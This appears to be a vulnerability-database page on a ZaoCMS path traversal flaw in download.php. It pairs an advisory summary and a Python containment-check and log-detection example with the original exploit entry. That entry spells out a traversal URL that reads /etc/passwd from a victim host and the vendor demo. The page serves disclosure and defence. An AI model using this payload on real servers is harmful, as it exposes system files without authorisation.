Vendor: ZaoCMS
By: His0k4, Dr-HTmL, Dos-Dz TeaM, Kondamne, Snakes TeaM ArAb Academy Security Team, and Ev!L-C0d3r.
CVSS: 7.5 (HIGH)
Type: Remote File Disclosure
CWE: 22 (Improper Limitation of a Pathname to a Restricted Directory)
Product Name: ZaoCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009

ZaoCMS Remote File Disclosure Vulnerability

A vulnerability in ZaoCMS allows a remote attacker to disclose files from the server. It is caused by improper validation of user-supplied input in the 'fichier' and 'Directory' parameters of the 'download.php' script: because neither value is confined to the intended directory, directory traversal strings passed in the 'Directory' parameter can be used to read arbitrary files on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of ZaoCMS.
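The defect described above is the classic CWE-22 pattern: two request parameters are joined into a path and served without checking that the result stays inside the intended directory. The following added example (not ZaoCMS code, and not from the advisory's authors) shows the containment check a hardened download handler needs, plus a small helper that applies the same check to logged request URLs so the traversal pattern from the advisory can be spotted during log review. The document root `UPLOAD_ROOT`, the host `example.invalid` and the second sample request are constructed assumptions; the traversal query string is the one published in the advisory.

```python
import os
from urllib.parse import parse_qs, urlsplit

# Hypothetical document root the download handler is meant to serve from;
# the advisory does not give ZaoCMS's real directory layout.
UPLOAD_ROOT = "/var/www/zaocms/uploads"


def resolve_download_path(root, directory, fichier):
    """Return the absolute path to serve, or None if the request must be refused.

    `directory` and `fichier` are the already percent-decoded query values
    (what PHP exposes in $_GET). The candidate path is normalised and then
    required to lie strictly inside `root`; os.path.commonpath is used rather
    than a string-prefix test so that a sibling such as `uploads_private`
    cannot pass. Production code should additionally call os.path.realpath
    on the candidate once it exists, so a symlink cannot point outside root.
    """
    # The file name must be a single path component: no separators, no "..".
    if not fichier or fichier in (".", "..") or "/" in fichier or os.sep in fichier:
        return None
    root = os.path.normpath(root)
    # os.path.join discards `root` when `directory` is absolute, which is exactly
    # why the containment check must run on the joined, normalised result.
    candidate = os.path.normpath(os.path.join(root, directory, fichier))
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:  # mixed absolute/relative paths or drive mismatch
        inside = False
    return candidate if inside else None


def request_escapes_root(url, root=UPLOAD_ROOT):
    """Detection helper for access-log review.

    Parses a logged download.php request (parse_qs percent-decodes the values,
    so the advisory's ..%2F sequences become ../) and reports whether the
    confinement check would have refused it.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    directory = query.get("Directory", [""])[0]
    fichier = query.get("fichier", [""])[0]
    return resolve_download_path(root, directory, fichier) is None


# Constructed sample log lines: the first carries the traversal pattern from
# the advisory behind a placeholder host, the second is a benign download.
SAMPLE_REQUESTS = [
    "http://example.invalid/admin/functions/PhpCommander/download.php"
    "?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F",
    "http://example.invalid/admin/functions/PhpCommander/download.php"
    "?fichier=report.pdf&Directory=docs%2F",
]


def flag_suspicious(urls, root=UPLOAD_ROOT):
    """Return the subset of `urls` whose parameters would escape `root`."""
    return [u for u in urls if request_escapes_root(u, root)]


if __name__ == "__main__":
    for url in flag_suspicious(SAMPLE_REQUESTS):
        print("traversal attempt:", url)
```

The important design choice is that the decision is made on the fully joined and normalised path, not on the raw parameters: blacklisting the literal string `../` is bypassable through encoding and absolute paths, whereas a containment test on the final path rejects every form of escape the same way.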

Exploit-DB raw data:

--------------------------------------------------------------
ZaoCMS Remote File Disclosure Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.zaocms.com/
Software : ZaoCMS
Note: The OperatIon Worked By Deleting Your Cookies From The Vuln 1
---------------------------------------------------------------
Exploit:
---------
http://wwww.victim.co.il/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
demo:
-------
http://demo.zaocms.com/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F
-----------------------------------------------------------------------------------------------------
His0k4  - Dr-HTmL , Dos-Dz TeaM , Kondamne , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-21]